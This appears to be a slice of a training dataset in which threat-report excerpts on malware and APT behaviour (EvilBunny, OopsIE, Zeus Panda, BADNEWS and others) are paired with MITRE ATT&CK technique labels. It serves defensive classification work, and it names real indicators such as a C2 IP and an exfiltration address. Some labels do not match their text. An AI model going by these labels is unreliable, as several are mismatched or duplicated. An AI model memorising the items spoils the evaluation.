| 251 | The attackers gain an initial foothold on targeted machines via phishing emails containing malicious attachments. The emails are often industry-specific and crafted to entice a victim to open the message and execute the attached document | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 252 | The companies believe that the actors acquired legitimate credentials prior to the cyber-attack to facilitate remote access | ['T1078 - Valid Accounts', 'T1219 - Remote Access Software'] | fine_tune |
| 253 | A loading script, written in Ruby, was saved to the following location and set to run as a Scheduled Task | ['T1053.005 - Scheduled Task/Job: Scheduled Task'] | fine_tune |
| 254 | The name EvilBunny is derived from debug information embedded in the malware’s dropper. Furthermore, the specified piece incorporates a Lua 5.1 interpreter, which allows the malware to execute Lua scripts and change its behavior at runtime. The dropper will place the EvilBunny malware under %APPDATA%\Perf Manager\ or %WINDIR%\msapps\; depending whether the dropper is running with administrative privileges or not. Also, the malware will generate numerous files to help its execution and frequently reply back to the C&C with status messages. Similar to its dropper, the binary seeks to evade sandboxes. Next to that, the main thread also runs sub threads to maintain log files the malware creates during execution and to keep track of the overall system load the malware creates. The worker threads are internally dubbed ‘hearer’, which is believed to stand for ‘listener’. It can be concluded thereafter that the malware authors were no English native speakers. The main action of the malware is carried out in the main thread, which parses commands and executes Lua scripts, provided by the worker threads via command files. Each hearer has a dedicated method to receive instructions which is either separately via HTTP from the server, aggregated through a downloaded data file or as tasks to be configured as scheduled tasks. In general this is a rather uncommon technique, but it has been observed before, especially in connection with some adware variants | ['T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 255 | The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments "-m security". Once created, the malware starts the service | ['T1543.003 - Create or Modify System Process: Windows Service'] | fine_tune |
| 256 | Sends phishing mail to given recipients and receives user’s access token using device code authentication flow | ['T1528 - Steal Application Access Token'] | fine_tune |
| 257 | First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message ("Payment: Find scheduled payment dates attached"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the "Templates" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\Windows\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload | ['T1053 - Scheduled Task/Job'] | fine_tune |
| 258 | Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you’ve copied) - Control your printer - Lock/Restart/Shutdown your computer - Update the implant with a new address to beacon to or new functionality | ['T1082 - System Information Discovery'] | fine_tune |
| 259 | This step establishes the persistence of the malware across reboots on the endpoint - Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 260 | Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK | ['T1071 - Application Layer Protocol'] | fine_tune |
| 261 | They include registry, file system manipulations, and searching files with specific patterns, and retrieving and transferring them back to the server and gathering network status information | ['T1083 - File and Directory Discovery'] | fine_tune |
| 262 | OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. hex(Environment.UserName/Environment.MachineName)> The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run. The C2 server will respond to the Trojan’s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting. If the C2 server provides the appropriate echoed data in the response, the Trojan attempts to determine what commands the C2 wishes to run by issuing a request to the following URL: http://<c2 domain>/what. hex(Environment.UserName/Environment.MachineName)> After issuing the what command, the Trojan will parse the C2's response for the string Oops, which the Trojan will treat as the C2 making a mistake and will exit | ['T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 263 | The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named “My_files.zip” to “My_files.zip.IAsnM”, “My_files2.zip” to “My_files2.zip.WZlF” and so on. Also, the threat actor creates the “RECOVER-FILES.txt” with ransom note in all folders that contain encrypted files, as shown in the figure below | ['T1486 - Data Encrypted for Impact'] | fine_tune |
| 264 | Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap | ['T1106 - Native API'] | fine_tune |
| 265 | Its functions include self-starting of the backdoor, collection of network configuration, keystroke records, and schedule other modules to execute by means of timers | ['T1016 - System Network Configuration Discovery'] | fine_tune |
| 266 | Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates | ['T1587.003 - Digital Certificates'] | fine_tune |
| 267 | The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \%TEMP%\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 268 | The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings | ['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1614.001 - System Location Discovery: System Language Discovery'] | fine_tune |
| 269 | Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file | ['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control'] | fine_tune |
| 270 | For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications | ['T1036 - Masquerading'] | fine_tune |
| 271 | Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command | ['T1113 - Screen Capture'] | fine_tune |
| 272 | The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc | ['T1083 - File and Directory Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel'] | fine_tune |
| 273 | Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings | ['T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 274 | This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group | ['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers'] | fine_tune |
| 275 | The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems | ['T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery'] | fine_tune |
| 276 | Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 277 | 1) Writes itself to %AppData%\Microsoft\Word\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default – this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.003 - Hide Artifacts: Hidden Window', 'T1112 - Modify Registry'] | fine_tune |
| 278 | After deobfuscation you can see “Imminent Monitor” string which may indicate it is related to Imminent Monitor RAT | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1123 - Audio Capture', 'T1125 - Video Capture'] | fine_tune |
| 279 | In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4 | ['T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 280 | Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc | ['T1105 - Ingress Tool Transfer', 'T1547 - Boot or Logon Autostart Execution'] | fine_tune |
| 281 | CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data | ['T1039 - Data from Network Shared Drive', 'T1005 - Data from Local System'] | fine_tune |
| 282 | The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process | ['T1071.001 - Application Layer Protocol: Web Protocols', 'T1055 - Process Injection'] | fine_tune |
| 283 | All the scripts are deleted immediately after being executed. TeamTNT also uses the “history -c” command to clear the shell log in every script | ['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.003 - Indicator Removal on Host: Clear Command History'] | fine_tune |
| 284 | McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact | ['T1560 - Archive Collected Data', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1573.001 - Symmetric Cryptography'] | fine_tune |
| 285 | Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8 | ['T1566.001 - Phishing: Spearphishing Attachment'] | fine_tune |
| 286 | Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload/Download/Delete files to/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host | ['T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery'] | fine_tune |
| 287 | While the ports associated with this sample’s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets | ['T1095 - Non-Application Layer Protocol', 'T1571 - Non-Standard Port'] | fine_tune |
| 288 | If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method | ['T1059.007 - Command and Scripting Interpreter: JavaScript'] | fine_tune |
| 289 | This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server "195.62.52.93" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive | ['T1083 - File and Directory Discovery', 'T1041 - Exfiltration Over C2 Channel', 'T1071.001 - Application Layer Protocol: Web Protocols'] | fine_tune |
| 290 | It then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: "Use FormSuggest", "FormSuggest Passwords", "FormSuggest PW Ask" under the sub-key “HKCU\Software\Microsoft\Internet Explorer\Main”, and "AutoSuggest" under the sub-key "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete | ['T1112 - Modify Registry'] | fine_tune |
| 291 | Indeed, any decent firewall would block incoming packets to any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible | ['T1205 - Traffic Signaling'] | fine_tune |
| 292 | The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 293 | The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings | ['T1518.001 - Software Discovery: Security Software Discovery', 'T1562.004 - Impair Defenses: Disable or Modify System Firewall'] | fine_tune |
| 294 | Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 295 | This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on | ['T1112 - Modify Registry'] | fine_tune |
| 296 | Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as ‘spwebmember | ['T1213.002 - Sharepoint', 'T1018 - Remote System Discovery', 'T1213.002 - Sharepoint'] | fine_tune |
| 297 | Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article | ['T1027 - Obfuscated Files or Information'] | fine_tune |
| 298 | The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails | ['T1586.002 - Email Accounts'] | fine_tune |
| 299 | Use of custom routines to decrypt strings (Deobfuscate/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027 | ['T1140 - Deobfuscate/Decode Files or Information'] | fine_tune |
| 300 | With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems | ['T1595.002 - Vulnerability Scanning'] | fine_tune |
| 301 | The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously | ['T1573.001 - Symmetric Cryptography'] | fine_tune |
| 302 | Depending on the Ramsay version, file collection won’t be restricted to the local system drive, but also will search additional drives such as network or removable drives | ['T1039 - Data from Network Shared Drive'] | fine_tune |
| 303 | We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method | ['T1036.005 - Masquerading: Match Legitimate Name or Location'] | fine_tune |
| 304 | During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host’s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations | ['T1001.001 - Junk Data'] | fine_tune |
| 305 | The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised | ['T1496 - Resource Hijacking'] | fine_tune |
| 306 | Avira’s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira’s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload | ['T1204.002 - User Execution: Malicious File', 'T1049 - System Network Connections Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1057 - Process Discovery', 'T1016 - System Network Configuration Discovery', 'T1083 - File and Directory Discovery'] | fine_tune |
| 307 | It also deletes Windows Event Logs : Application, Security, Setup, System. It is less focused on deleting documents | ['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs'] | fine_tune |
| 308 | We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion | ['T1071.003 - Mail Protocols', 'T1001.002 - Data Obfuscation via Steganography'] | fine_tune |
| 309 | Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine’s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the ‘++a++’ markers. The example C2s used by older variants of Comnie demonstrates this | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 310 | DropBook’s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them | ['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery'] | fine_tune |
| 311 | The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included | ['T1102.002 - Bidirectional Communication'] | fine_tune |
| 312 | Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection | ['T1564.004 - Hide Artifacts: NTFS File Attributes', 'T1132.001 - Data Encoding: Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding'] | fine_tune |
| 313 | In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 314 | It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage | ['T1059.001 - Command and Scripting Interpreter: PowerShell'] | fine_tune |
| 315 | In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore | ['T1560 - Archive Collected Data'] | fine_tune |
| 316 | The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer | ['T1082 - System Information Discovery'] | fine_tune |
| 317 | Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk | ['T1566.002 - Phishing: Spearphishing Link'] | fine_tune |
| 318 | Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 319 | The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors – file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module | ['T1119 - Automated Collection'] | fine_tune |
| 320 | Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | fine_tune |
| 321 | The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex ‘com_mycompany_apps_appname_new’. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim’s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server | ['T1105 - Ingress Tool Transfer'] | fine_tune |
| 322 | Fast-paced intrusion • Very stealthy • Rapidly changing tactics • Employed advanced attack techniques 4) 4. All rights reserved.23 Our Response: Tackled Attacker WMI Usage ADVANCED ATTACK TECHNIQUES 24) 24. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. All rights reserved.25 Our Response: Increased PowerShell Visibility ADVANCED ATTACK TECHNIQUES 26) 26. All rights reserved.27 Our Response: Addressed Ticket Attacks ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634 28) 28. All rights reserved.29 BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment 30) 30 | ['T1550.003 - Use Alternate Authentication Material: Pass the Ticket'] | fine_tune |
| 323 | Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN). Discord’s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL | ['T1102 - Web Service'] | fine_tune |
| 324 | Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications | ['T1573.002 - Asymmetric Cryptography'] | fine_tune |
| 325 | Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server | ['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol'] | fine_tune |
| 326 | Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents | ['T1539 - Steal Web Session Cookie'] | fine_tune |
| 327 | The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger | ['T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks'] | fine_tune |
| 328 | APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip | ['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1021.004 - Remote Services: SSH', 'T1018 - Remote System Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1090.001 - Proxy: Internal Proxy'] | fine_tune |
| 329 | is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate | ['T1115 - Clipboard Data'] | fine_tune |
| 330 | At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for | ['T1553.002 - Code Signing'] | fine_tune |
| 331 | All this information is stored in the C:\Users\Public\Videos\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message’s Subject: set to the id | ['T1074.001 - Data Staged: Local Data Staging'] | fine_tune |
| 332 | If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\Local\Temp\ directory, creates a randomly-named folder under C:\ProgramData\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties | ['T1036.004 - Masquerading: Masquerade Task or Service'] | fine_tune |
| 333 | This report provides background on Windows container vulnerabilities, gives a technical overview of Siloscape and offers recommendations on best practices for securing Windows containers | ['T1068 - Exploitation for Privilege Escalation'] | fine_tune |
| 334 | Fine-tuning DaserfOur analyses revealed Daserf regularly undergo technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Ceasar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards | ['T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027.005 - Indicator Removal from Tools', 'T1027 - Obfuscated Files or Information'] | fine_tune |
| 335 | MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon | ['T1105 - Ingress Tool Transfer', 'T1608.001 - Upload Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic'] | fine_tune |
